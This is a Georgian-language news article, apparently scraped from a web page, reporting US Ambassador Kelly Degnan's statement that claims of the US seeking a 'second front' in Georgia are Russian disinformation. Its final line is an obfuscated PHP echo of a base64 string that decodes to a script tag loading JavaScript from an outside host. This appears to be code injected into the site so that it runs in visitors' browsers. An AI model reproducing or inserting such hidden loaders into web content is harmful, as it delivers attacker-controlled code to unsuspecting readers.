celsiusi
ავერსი საქკაბელი
აშშ-ის ელჩის საქართველოში კელი დეგნანის განცხადებით, მოსაზრება, რომ ამერიკის შეერთებულ შტატებს საქართველოში მეორე ფრონტის გახსნა სურს რუსულ დეზინფორმაციაა. 
 
დეგნანმა ეს განცხადება, ხელისუფლების წარმომადგენლების ანტიდასავლური პროპაგანდის შესახებ დასმული კითხვის საპასუხოდ გააკეთა. 
 
მისივე თქმით, აშშ მხარს უჭერს საქართველოსთვის ევროკავშირის კანდიდატობას. 30 წლის განმავლობაში აშშ მუშაობდა საქართველოს სრული ინტეგრაციისთვის ევროატლანტიკურ საზოგადოებაში. 
 
"თითქმის ყველაფერი, რაც გაგვიკეთებია და რასაც ვაკეთებთ საქაღთველოში, ორიენტირებულია საქართველოს მოსახლეობის მისწრაფებებზე, გახდეს ევროკავშირის და ნატოს წევრი. ეს არის ის, რაც ქართველ ხალხს სურს და რასაც აშშ მტკიცედ უჭერს მხარს.
 
აქ ზოგი ამბობს, რომ აშშ მუშაობს საქართველოს წინააღმდეგ ან საქართველოს ომში ჩასართავად, მეორე ფრონტის გასახსნელად. ეს არის 100% რუსული დეზინფორმაცია. აბსოლუტურად არ არის სიმართლე. აშშ-მა ყველაფერი გააკეთა, რაც შეეძლო, ამ ომის შესაჩერებლად. მის დაწყებამდე მუშაობდა პრევენციისთვის. ჩვენ საერთოდ არ გვინდა საქართველოს ჩართვა ამ ომში. რასაც ევროკავშირი და ნატო ემსახურება, არის მშვიდობა და კეთილდღეობა. ეს გვინდა საქართველოსთვის“, — განაცხადა დეგნანმა.
 
მისი თქმით, პრემიერ-მინისტრის ნაცვლად ვერ ისაუბრებს, მაგრამ, ასევე, არ იცის არავინ საქართველოში, ვისაც საქართველოს ამ ომში ჩართვა სურს.
 
„ყველამ საქართველოში და შეერთებულმა შტატებმა იციან, რა გამოიარა საქართველომ და რა ხდება უკრაინაში. ის გულუხვი ჰუმანიტარული დახმარება, რაც საქართველოდან უკრაინაში გაიგზავნა, აჩვენებს როგორ თანაუგრძობენ ქართველები უკრაინელებს. ახლა არ არის ჩხუის და დაპირსიპირების დრო. ეს ის მომენტია, როდესაც ყველა უნდა გაერთიანდეს ერთი კონკრეტული საკითხის ირგვლივ“, — განაცხადა დეგნანმა და დასძინა, რომ ის, რაც საქართველოს ახლა სჭირდება, გამოხატულია დევიზში „ძალა ერთობაშია“.
 
556
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");